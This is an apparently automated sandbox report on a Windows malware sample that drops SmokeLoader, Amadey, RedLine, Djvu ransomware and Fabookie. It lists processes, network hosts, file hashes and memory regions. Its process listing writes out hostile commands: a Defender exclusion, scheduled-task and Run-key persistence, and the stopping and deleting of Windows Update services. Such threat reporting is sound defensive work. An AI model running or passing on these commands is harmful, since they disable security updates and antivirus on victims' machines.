Malware Analysis Report

2025-04-14 07:03

Sample ID 230723-vm2khsfg9w
Target f18c21e36a4120f84568aa83f542385ddcfbc9c7df4ec58fa8a22569dc2f0253
SHA256 f18c21e36a4120f84568aa83f542385ddcfbc9c7df4ec58fa8a22569dc2f0253
Tags
amadey djvu fabookie redline smokeloader logsdiller cloud (tg: @logsdillabot) pub1 backdoor discovery evasion infostealer ransomware spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

f18c21e36a4120f84568aa83f542385ddcfbc9c7df4ec58fa8a22569dc2f0253

Threat Level: Known bad

The file f18c21e36a4120f84568aa83f542385ddcfbc9c7df4ec58fa8a22569dc2f0253 was found to be: Known bad.

Malicious Activity Summary

amadey djvu fabookie redline smokeloader logsdiller cloud (tg: @logsdillabot) pub1 backdoor discovery evasion infostealer ransomware spyware stealer trojan

SmokeLoader

Detected Djvu ransomware

Amadey

RedLine

Djvu Ransomware

Detect Fabookie payload

Fabookie

Downloads MZ/PE file

Stops running service(s)

Loads dropped DLL

Executes dropped EXE

Modifies file permissions

Deletes itself

Looks up external IP address via web service

Suspicious use of SetThreadContext

Launches sc.exe

Program crash

Unsigned PE

Checks SCSI registry key(s)

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Creates scheduled task(s)

Uses Task Scheduler COM API

Suspicious behavior: MapViewOfSection

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-07-23 17:07

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-07-23 17:07

Reported

2023-07-23 17:09

Platform

win10-20230703-en

Max time kernel

37s

Max time network

158s

Command Line

"C:\Users\Admin\AppData\Local\Temp\f18c21e36a4120f84568aa83f542385ddcfbc9c7df4ec58fa8a22569dc2f0253.exe"

Signatures

Amadey

trojan amadey

Detect Fabookie payload

Description Indicator Process Target
N/A N/A N/A N/A

Detected Djvu ransomware

Description Indicator Process Target
N/A N/A N/A N/A (20 identical rows)

Djvu Ransomware

ransomware djvu

Fabookie

spyware stealer fabookie

RedLine

infostealer redline

SmokeLoader

trojan backdoor smokeloader

Downloads MZ/PE file

Stops running service(s)

evasion

Deletes itself

Description Indicator Process Target
N/A N/A N/A N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A

Modifies file permissions

discovery

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.2ip.ua N/A N/A (13 identical rows)

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2468 set thread context of 4508 N/A C:\Users\Admin\AppData\Local\Temp\FE17.exe C:\Users\Admin\AppData\Local\Temp\FE17.exe

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\System32\sc.exe N/A

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\95DF.exe

Checks SCSI registry key(s)

Description Indicator Process Target
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\f18c21e36a4120f84568aa83f542385ddcfbc9c7df4ec58fa8a22569dc2f0253.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\f18c21e36a4120f84568aa83f542385ddcfbc9c7df4ec58fa8a22569dc2f0253.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\f18c21e36a4120f84568aa83f542385ddcfbc9c7df4ec58fa8a22569dc2f0253.exe N/A

Creates scheduled task(s)

persistence

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\f18c21e36a4120f84568aa83f542385ddcfbc9c7df4ec58fa8a22569dc2f0253.exe N/A (2 identical rows)
N/A N/A N/A N/A (62 identical rows)

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\f18c21e36a4120f84568aa83f542385ddcfbc9c7df4ec58fa8a22569dc2f0253.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3220 wrote to memory of 2468 N/A N/A C:\Users\Admin\AppData\Local\Temp\FE17.exe (3 identical rows)
PID 3220 wrote to memory of 3968 N/A N/A C:\Windows\system32\regsvr32.exe (2 identical rows)
PID 3968 wrote to memory of 3212 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe (3 identical rows)
PID 3220 wrote to memory of 2336 N/A N/A C:\Windows\system32\regsvr32.exe (2 identical rows)
PID 2468 wrote to memory of 4508 N/A C:\Users\Admin\AppData\Local\Temp\FE17.exe C:\Users\Admin\AppData\Local\Temp\FE17.exe (3 identical rows)
PID 2336 wrote to memory of 4876 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe (3 identical rows)
PID 2468 wrote to memory of 4508 N/A C:\Users\Admin\AppData\Local\Temp\FE17.exe C:\Users\Admin\AppData\Local\Temp\FE17.exe (7 identical rows)
PID 3220 wrote to memory of 368 N/A N/A C:\Users\Admin\AppData\Local\Temp\79F.exe (3 identical rows)
PID 3220 wrote to memory of 5040 N/A N/A C:\Users\Admin\AppData\Local\Temp\B0B.exe (3 identical rows)
PID 3220 wrote to memory of 3808 N/A N/A C:\Users\Admin\AppData\Local\Temp\12EC.exe (3 identical rows)

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\f18c21e36a4120f84568aa83f542385ddcfbc9c7df4ec58fa8a22569dc2f0253.exe

"C:\Users\Admin\AppData\Local\Temp\f18c21e36a4120f84568aa83f542385ddcfbc9c7df4ec58fa8a22569dc2f0253.exe"

C:\Users\Admin\AppData\Local\Temp\FE17.exe

C:\Users\Admin\AppData\Local\Temp\FE17.exe

C:\Windows\system32\regsvr32.exe

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\C7.dll

C:\Windows\SysWOW64\regsvr32.exe

/s C:\Users\Admin\AppData\Local\Temp\C7.dll

C:\Windows\system32\regsvr32.exe

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\210.dll

C:\Windows\SysWOW64\regsvr32.exe

/s C:\Users\Admin\AppData\Local\Temp\210.dll

C:\Users\Admin\AppData\Local\Temp\FE17.exe

C:\Users\Admin\AppData\Local\Temp\FE17.exe

C:\Users\Admin\AppData\Local\Temp\79F.exe

C:\Users\Admin\AppData\Local\Temp\79F.exe

C:\Users\Admin\AppData\Local\Temp\B0B.exe

C:\Users\Admin\AppData\Local\Temp\B0B.exe

C:\Users\Admin\AppData\Local\Temp\12EC.exe

C:\Users\Admin\AppData\Local\Temp\12EC.exe

C:\Users\Admin\AppData\Local\Temp\2089.exe

C:\Users\Admin\AppData\Local\Temp\2089.exe

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Users\Admin\AppData\Local\fed1e4b1-7e96-4a63-9aa8-04eed357422f" /deny *S-1-1-0:(OI)(CI)(DE,DC)

C:\Users\Admin\AppData\Local\Temp\aafg31.exe

"C:\Users\Admin\AppData\Local\Temp\aafg31.exe"

C:\Users\Admin\AppData\Local\Temp\oldplayer.exe

"C:\Users\Admin\AppData\Local\Temp\oldplayer.exe"

C:\Users\Admin\AppData\Local\Temp\XandETC.exe

"C:\Users\Admin\AppData\Local\Temp\XandETC.exe"

C:\Users\Admin\AppData\Local\Temp\FE17.exe

"C:\Users\Admin\AppData\Local\Temp\FE17.exe" --Admin IsNotAutoStart IsNotTask

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

"C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe" /F

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "oneetx.exe" /P "Admin:N"&&CACLS "oneetx.exe" /P "Admin:R" /E&&echo Y|CACLS "..\207aa4515d" /P "Admin:N"&&CACLS "..\207aa4515d" /P "Admin:R" /E&&Exit

C:\Users\Admin\AppData\Local\Temp\3942.exe

C:\Users\Admin\AppData\Local\Temp\3942.exe

C:\Users\Admin\AppData\Local\Temp\3BD4.exe

C:\Users\Admin\AppData\Local\Temp\3BD4.exe

C:\Users\Admin\AppData\Local\Temp\FE17.exe

"C:\Users\Admin\AppData\Local\Temp\FE17.exe" --Admin IsNotAutoStart IsNotTask

C:\Users\Admin\AppData\Local\Temp\4A7B.exe

C:\Users\Admin\AppData\Local\Temp\4A7B.exe

C:\Users\Admin\AppData\Local\Temp\3942.exe

C:\Users\Admin\AppData\Local\Temp\3942.exe

C:\Users\Admin\AppData\Local\Temp\3BD4.exe

C:\Users\Admin\AppData\Local\Temp\3BD4.exe

C:\Users\Admin\AppData\Local\Temp\4C21.exe

C:\Users\Admin\AppData\Local\Temp\4C21.exe

C:\Users\Admin\AppData\Local\Temp\5A1D.exe

C:\Users\Admin\AppData\Local\Temp\5A1D.exe

C:\Users\Admin\AppData\Local\Temp\4A7B.exe

C:\Users\Admin\AppData\Local\Temp\4A7B.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Users\Admin\AppData\Local\Temp\4C21.exe

C:\Users\Admin\AppData\Local\Temp\4C21.exe

C:\Windows\SysWOW64\cacls.exe

CACLS "oneetx.exe" /P "Admin:N"

C:\Users\Admin\AppData\Local\Temp\3BD4.exe

"C:\Users\Admin\AppData\Local\Temp\3BD4.exe" --Admin IsNotAutoStart IsNotTask

C:\Users\Admin\AppData\Local\151c072c-a790-4b59-a92a-35c783e9855c\build2.exe

"C:\Users\Admin\AppData\Local\151c072c-a790-4b59-a92a-35c783e9855c\build2.exe"

C:\Users\Admin\AppData\Local\Temp\9561.exe

C:\Users\Admin\AppData\Local\Temp\9561.exe

C:\Windows\system32\regsvr32.exe

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\9802.dll

C:\Users\Admin\AppData\Local\Temp\4C21.exe

"C:\Users\Admin\AppData\Local\Temp\4C21.exe" --Admin IsNotAutoStart IsNotTask

C:\Users\Admin\AppData\Local\151c072c-a790-4b59-a92a-35c783e9855c\build3.exe

"C:\Users\Admin\AppData\Local\151c072c-a790-4b59-a92a-35c783e9855c\build3.exe"

C:\Users\Admin\AppData\Local\Temp\4A7B.exe

"C:\Users\Admin\AppData\Local\Temp\4A7B.exe" --Admin IsNotAutoStart IsNotTask

C:\Windows\SysWOW64\regsvr32.exe

/s C:\Users\Admin\AppData\Local\Temp\9802.dll

C:\Windows\SysWOW64\cacls.exe

CACLS "oneetx.exe" /P "Admin:R" /E

C:\Users\Admin\AppData\Local\Temp\3942.exe

"C:\Users\Admin\AppData\Local\Temp\3942.exe" --Admin IsNotAutoStart IsNotTask

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Users\Admin\AppData\Local\Temp\67E6.exe

C:\Users\Admin\AppData\Local\Temp\67E6.exe

C:\Windows\SysWOW64\schtasks.exe

/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"

C:\Users\Admin\AppData\Local\Temp\8E7B.exe

C:\Users\Admin\AppData\Local\Temp\8E7B.exe

C:\Users\Admin\AppData\Local\Temp\3BD4.exe

"C:\Users\Admin\AppData\Local\Temp\3BD4.exe" --Admin IsNotAutoStart IsNotTask

C:\Users\Admin\AppData\Local\Temp\89E6.exe

C:\Users\Admin\AppData\Local\Temp\89E6.exe

C:\Users\Admin\AppData\Local\Temp\9561.exe

C:\Users\Admin\AppData\Local\Temp\9561.exe

C:\Users\Admin\AppData\Local\Temp\3942.exe

"C:\Users\Admin\AppData\Local\Temp\3942.exe" --Admin IsNotAutoStart IsNotTask

C:\Users\Admin\AppData\Local\Temp\4C21.exe

"C:\Users\Admin\AppData\Local\Temp\4C21.exe" --Admin IsNotAutoStart IsNotTask

C:\Users\Admin\AppData\Local\Temp\4A7B.exe

"C:\Users\Admin\AppData\Local\Temp\4A7B.exe" --Admin IsNotAutoStart IsNotTask

C:\Users\Admin\AppData\Local\Temp\95DF.exe

C:\Users\Admin\AppData\Local\Temp\95DF.exe

C:\Users\Admin\AppData\Local\Temp\89E6.exe

C:\Users\Admin\AppData\Local\Temp\89E6.exe

C:\Windows\SysWOW64\cacls.exe

CACLS "..\207aa4515d" /P "Admin:N"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4876 -s 780

C:\Windows\SysWOW64\cacls.exe

CACLS "..\207aa4515d" /P "Admin:R" /E

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wsyzqeupt#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'NoteUpdateTaskMachineQC' /tr '''C:\Program Files\Notepad\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Notepad\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'NoteUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "NoteUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Notepad\Chrome\updater.exe' }

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f

C:\Users\Admin\AppData\Local\Temp\9561.exe

"C:\Users\Admin\AppData\Local\Temp\9561.exe" --Admin IsNotAutoStart IsNotTask

C:\Users\Admin\AppData\Local\Temp\AD11.exe

C:\Users\Admin\AppData\Local\Temp\AD11.exe

C:\Users\Admin\AppData\Local\Temp\9561.exe

"C:\Users\Admin\AppData\Local\Temp\9561.exe" --Admin IsNotAutoStart IsNotTask

C:\Users\Admin\AppData\Local\Temp\B05E.exe

C:\Users\Admin\AppData\Local\Temp\B05E.exe

C:\Users\Admin\AppData\Local\0b308a45-a6ef-46f9-9fa5-5e523635e756\build2.exe

"C:\Users\Admin\AppData\Local\0b308a45-a6ef-46f9-9fa5-5e523635e756\build2.exe"

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\sc.exe

sc stop UsoSvc

Network

Country Destination Domain Proto
US 8.8.8.8:53 potunulit.org udp
US 188.114.96.0:80 potunulit.org tcp
US 8.8.8.8:53 colisumy.com udp
KR 211.40.39.251:80 colisumy.com tcp
US 8.8.8.8:53 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa udp
US 8.8.8.8:53 0.96.114.188.in-addr.arpa udp
US 8.8.8.8:53 251.39.40.211.in-addr.arpa udp
NL 194.169.175.139:3003 194.169.175.139 tcp
US 8.8.8.8:53 api.2ip.ua udp
US 8.8.8.8:53 139.175.169.194.in-addr.arpa udp
NL 162.0.217.254:443 api.2ip.ua tcp
US 8.8.8.8:53 254.217.0.162.in-addr.arpa udp
US 8.8.8.8:53 nordskills.eu udp
PS 213.6.54.58:443 nordskills.eu tcp
US 8.8.8.8:53 126.22.238.8.in-addr.arpa udp
US 8.8.8.8:53 58.54.6.213.in-addr.arpa udp
US 8.8.8.8:53 101.15.18.104.in-addr.arpa udp
DE 45.9.74.80:80 45.9.74.80 tcp
US 8.8.8.8:53 80.74.9.45.in-addr.arpa udp
FR 149.202.8.114:26642 tcp
FR 149.202.8.114:26642 tcp
US 8.8.8.8:53 114.8.202.149.in-addr.arpa udp
KR 211.40.39.251:80 colisumy.com tcp
US 8.8.8.8:53 us.imgjeoigaa.com udp
HK 103.100.211.218:80 us.imgjeoigaa.com tcp
US 8.8.8.8:53 218.211.100.103.in-addr.arpa udp
RU 5.42.65.80:80 5.42.65.80 tcp
US 8.8.8.8:53 80.65.42.5.in-addr.arpa udp
NL 162.0.217.254:443 api.2ip.ua tcp
NL 194.169.175.139:3003 194.169.175.139 tcp
KR 211.40.39.251:80 colisumy.com tcp
US 8.8.8.8:53 zexeq.com udp
KR 211.40.39.251:80 colisumy.com tcp
NL 162.0.217.254:443 api.2ip.ua tcp
KR 211.119.84.111:80 zexeq.com tcp
NL 162.0.217.254:443 api.2ip.ua tcp
NL 162.0.217.254:443 api.2ip.ua tcp
US 8.8.8.8:53 aa.imgjeoogbb.com udp
NL 162.0.217.254:443 api.2ip.ua tcp
HK 154.221.26.108:80 aa.imgjeoogbb.com tcp
US 8.8.8.8:53 111.84.119.211.in-addr.arpa udp
FR 149.202.8.114:26642 tcp
US 8.8.8.8:53 108.26.221.154.in-addr.arpa udp
KR 211.119.84.111:80 zexeq.com tcp
US 8.8.8.8:53 233.141.123.20.in-addr.arpa udp
NL 194.169.175.139:3003 194.169.175.139 tcp
US 8.8.8.8:53 greenbi.net udp
KR 175.119.10.231:80 greenbi.net tcp
KR 175.119.10.231:80 greenbi.net tcp
US 8.8.8.8:53 231.10.119.175.in-addr.arpa udp
PS 213.6.54.58:443 nordskills.eu tcp
KR 175.119.10.231:80 greenbi.net tcp
US 8.8.8.8:53 24.73.42.20.in-addr.arpa udp
DE 45.9.74.80:80 45.9.74.80 tcp
KR 175.119.10.231:80 greenbi.net tcp
US 8.8.8.8:53 9.57.101.20.in-addr.arpa udp
NL 162.0.217.254:443 api.2ip.ua tcp
KR 211.40.39.251:80 colisumy.com tcp
KR 175.119.10.231:80 greenbi.net tcp
NL 162.0.217.254:443 api.2ip.ua tcp
FR 149.202.8.114:26642 tcp
KR 175.119.10.231:80 greenbi.net tcp
KR 211.40.39.251:80 colisumy.com tcp
NL 162.0.217.254:443 api.2ip.ua tcp
KR 175.119.10.231:80 greenbi.net tcp
NL 162.0.217.254:443 api.2ip.ua tcp
NL 162.0.217.254:443 api.2ip.ua tcp
NL 162.0.217.254:443 api.2ip.ua tcp
NL 194.169.175.139:3003 194.169.175.139 tcp
KR 175.119.10.231:80 greenbi.net tcp
KR 211.40.39.251:80 colisumy.com tcp
KR 175.119.10.231:80 greenbi.net tcp
KR 211.119.84.111:80 zexeq.com tcp

Files

memory/5060-121-0x0000000002730000-0x0000000002830000-memory.dmp

memory/5060-122-0x0000000000400000-0x000000000246F000-memory.dmp

memory/5060-123-0x00000000026B0000-0x00000000026B9000-memory.dmp

memory/3220-124-0x0000000001320000-0x0000000001336000-memory.dmp

memory/5060-125-0x0000000000400000-0x000000000246F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\FE17.exe

MD5 d7ee13f748b73d180c5bd3e9385ceb00
SHA1 6c31e9f5eda2696ed5eb21af81467c8507591edb
SHA256 86e73fa70c51113dda5d32d8b7b18271ad51806fcd254a2189c57a496e9c86ba
SHA512 3f0a03720f66f328ec5c1e8c1b130f01688e63c3c9298182f671e7dec110a50d91f8a749a2f9c1b168186e6c5345d53e3491634c0324b0922c4cf417f52823fe

C:\Users\Admin\AppData\Local\Temp\C7.dll

MD5 f81fc87a82e628512761653d103abfba
SHA1 7e0e4ff9fcde5fbbf2ab8f93c713f62aeed2b822
SHA256 aee1d02d1d2a22610d3c7f9ab4dc78f1d2ff27c1c3b3dc663faf7fd3795c110d
SHA512 2dbbc6f75aada85f2822e63b6e481f0df121774a7e737a8df5f182d8092fb3795f9c5ecc3588b072afb6be812ec972447530995af00a956532f971acc8d67e1f

\Users\Admin\AppData\Local\Temp\C7.dll

MD5 f81fc87a82e628512761653d103abfba
SHA1 7e0e4ff9fcde5fbbf2ab8f93c713f62aeed2b822
SHA256 aee1d02d1d2a22610d3c7f9ab4dc78f1d2ff27c1c3b3dc663faf7fd3795c110d
SHA512 2dbbc6f75aada85f2822e63b6e481f0df121774a7e737a8df5f182d8092fb3795f9c5ecc3588b072afb6be812ec972447530995af00a956532f971acc8d67e1f

memory/3212-139-0x0000000000BB0000-0x0000000000CE4000-memory.dmp

memory/3212-143-0x0000000000BB0000-0x0000000000CE4000-memory.dmp

memory/2468-144-0x0000000004150000-0x00000000041E4000-memory.dmp

memory/2468-146-0x00000000041F0000-0x000000000430B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\210.dll

MD5 f81fc87a82e628512761653d103abfba
SHA1 7e0e4ff9fcde5fbbf2ab8f93c713f62aeed2b822
SHA256 aee1d02d1d2a22610d3c7f9ab4dc78f1d2ff27c1c3b3dc663faf7fd3795c110d
SHA512 2dbbc6f75aada85f2822e63b6e481f0df121774a7e737a8df5f182d8092fb3795f9c5ecc3588b072afb6be812ec972447530995af00a956532f971acc8d67e1f

memory/3212-141-0x0000000000540000-0x0000000000546000-memory.dmp

\Users\Admin\AppData\Local\Temp\C7.dll

MD5 f81fc87a82e628512761653d103abfba
SHA1 7e0e4ff9fcde5fbbf2ab8f93c713f62aeed2b822
SHA256 aee1d02d1d2a22610d3c7f9ab4dc78f1d2ff27c1c3b3dc663faf7fd3795c110d
SHA512 2dbbc6f75aada85f2822e63b6e481f0df121774a7e737a8df5f182d8092fb3795f9c5ecc3588b072afb6be812ec972447530995af00a956532f971acc8d67e1f

memory/4508-148-0x0000000000400000-0x0000000000537000-memory.dmp

memory/4508-153-0x0000000000400000-0x0000000000537000-memory.dmp

memory/4876-154-0x0000000000B50000-0x0000000000C84000-memory.dmp

\Users\Admin\AppData\Local\Temp\210.dll

MD5 f81fc87a82e628512761653d103abfba
SHA1 7e0e4ff9fcde5fbbf2ab8f93c713f62aeed2b822
SHA256 aee1d02d1d2a22610d3c7f9ab4dc78f1d2ff27c1c3b3dc663faf7fd3795c110d
SHA512 2dbbc6f75aada85f2822e63b6e481f0df121774a7e737a8df5f182d8092fb3795f9c5ecc3588b072afb6be812ec972447530995af00a956532f971acc8d67e1f

memory/4508-150-0x0000000000400000-0x0000000000537000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\FE17.exe

MD5 d7ee13f748b73d180c5bd3e9385ceb00
SHA1 6c31e9f5eda2696ed5eb21af81467c8507591edb
SHA256 86e73fa70c51113dda5d32d8b7b18271ad51806fcd254a2189c57a496e9c86ba
SHA512 3f0a03720f66f328ec5c1e8c1b130f01688e63c3c9298182f671e7dec110a50d91f8a749a2f9c1b168186e6c5345d53e3491634c0324b0922c4cf417f52823fe

memory/4876-156-0x0000000000B50000-0x0000000000C84000-memory.dmp

memory/4876-157-0x00000000007E0000-0x00000000007E6000-memory.dmp

memory/4508-155-0x0000000000400000-0x0000000000537000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\79F.exe

MD5 d1c4c493c171000d21ae122bc5d819ba
SHA1 e469267b65d3aacb2fe5074fd2a54485fab00ef0
SHA256 76ae20cea89aac265c5403e1cd0e7baab8f205eaed7a48f199f86b4009d57df5
SHA512 c754970b9f506e8067eab9ec89ae56328a46333e87d97b13b88de1097cc6bdfd3aee60c7efa65643a2d5d77b70b397d5222395e3268eda70d9ae5cfb12be012e

C:\Users\Admin\AppData\Local\Temp\B0B.exe

MD5 d1c4c493c171000d21ae122bc5d819ba
SHA1 e469267b65d3aacb2fe5074fd2a54485fab00ef0
SHA256 76ae20cea89aac265c5403e1cd0e7baab8f205eaed7a48f199f86b4009d57df5
SHA512 c754970b9f506e8067eab9ec89ae56328a46333e87d97b13b88de1097cc6bdfd3aee60c7efa65643a2d5d77b70b397d5222395e3268eda70d9ae5cfb12be012e

memory/368-168-0x0000000002590000-0x0000000002690000-memory.dmp

memory/368-169-0x0000000002510000-0x000000000254F000-memory.dmp

memory/368-170-0x0000000006940000-0x0000000006978000-memory.dmp

memory/368-171-0x0000000006A10000-0x0000000006F0E000-memory.dmp

memory/368-172-0x0000000006F10000-0x0000000006F44000-memory.dmp

memory/368-176-0x0000000000400000-0x0000000002485000-memory.dmp

memory/368-177-0x0000000006A00000-0x0000000006A10000-memory.dmp

memory/368-179-0x0000000009470000-0x0000000009476000-memory.dmp

memory/368-178-0x0000000006A00000-0x0000000006A10000-memory.dmp

memory/368-180-0x0000000006A00000-0x0000000006A10000-memory.dmp

memory/5040-181-0x00000000027B0000-0x00000000028B0000-memory.dmp

memory/5040-184-0x000000000C6A0000-0x000000000CCA6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\12EC.exe

MD5 c9de9148f899b175350adb5cd3d077e5
SHA1 9de7bf5a1f2bed9a48e505e88efdd164453afc44
SHA256 c792eb7144a343e7d3b9036a0df4381353c265e5574522687b2df0be2685fc6e
SHA512 ce786835569989c36820217cd4594f02d0aa9cb2602587dc5da3b38fa8cfda24b98930b635f777bfa8219e46f44a243a056c0b758ab90d748a7b75464e76ed43

memory/368-187-0x0000000007700000-0x000000000780A000-memory.dmp

memory/368-188-0x0000000007840000-0x0000000007852000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\12EC.exe

MD5 c9de9148f899b175350adb5cd3d077e5
SHA1 9de7bf5a1f2bed9a48e505e88efdd164453afc44
SHA256 c792eb7144a343e7d3b9036a0df4381353c265e5574522687b2df0be2685fc6e
SHA512 ce786835569989c36820217cd4594f02d0aa9cb2602587dc5da3b38fa8cfda24b98930b635f777bfa8219e46f44a243a056c0b758ab90d748a7b75464e76ed43

memory/5040-189-0x0000000000400000-0x0000000002485000-memory.dmp

memory/368-190-0x0000000007860000-0x000000000789E000-memory.dmp

memory/368-192-0x0000000007A00000-0x0000000007A4B000-memory.dmp

memory/5040-196-0x00000000048A0000-0x00000000048B0000-memory.dmp

memory/5040-193-0x00000000048A0000-0x00000000048B0000-memory.dmp

memory/5040-191-0x00000000048A0000-0x00000000048B0000-memory.dmp

memory/368-197-0x0000000072FD0000-0x00000000736BE000-memory.dmp

memory/5040-199-0x0000000072FD0000-0x00000000736BE000-memory.dmp

memory/3212-201-0x0000000000F10000-0x000000000100B000-memory.dmp

memory/368-200-0x0000000006A00000-0x0000000006A10000-memory.dmp

memory/3808-203-0x00000000007D0000-0x00000000008D0000-memory.dmp

memory/3808-205-0x00000000005F0000-0x00000000005F9000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\2089.exe

MD5 c43cbad7257cba5352f8b9eaa19c7709
SHA1 04179590b7da86e2bc79425d544d347c7de7b0fc
SHA256 f0c7026d5e40c38d3ce5ca2669f57da25992dff637753b0220a66994decadde4
SHA512 a14c05344d6f9279d733b23d3dbc8e3a8b06b4114976f508d7336ad7aeddd6a532fa27c65f8e34593e4d8f84aa1874d53b960f72a1ac45a2b7c514f57cbae0e8

memory/3808-207-0x0000000000400000-0x00000000004BB000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\2089.exe

MD5 c43cbad7257cba5352f8b9eaa19c7709
SHA1 04179590b7da86e2bc79425d544d347c7de7b0fc
SHA256 f0c7026d5e40c38d3ce5ca2669f57da25992dff637753b0220a66994decadde4
SHA512 a14c05344d6f9279d733b23d3dbc8e3a8b06b4114976f508d7336ad7aeddd6a532fa27c65f8e34593e4d8f84aa1874d53b960f72a1ac45a2b7c514f57cbae0e8

memory/3212-213-0x0000000004490000-0x0000000004571000-memory.dmp

memory/2312-215-0x0000000000070000-0x00000000004F4000-memory.dmp

memory/3212-216-0x0000000004490000-0x0000000004571000-memory.dmp

memory/2312-217-0x0000000072FD0000-0x00000000736BE000-memory.dmp

memory/3212-219-0x0000000004490000-0x0000000004571000-memory.dmp

memory/3212-221-0x0000000004490000-0x0000000004571000-memory.dmp

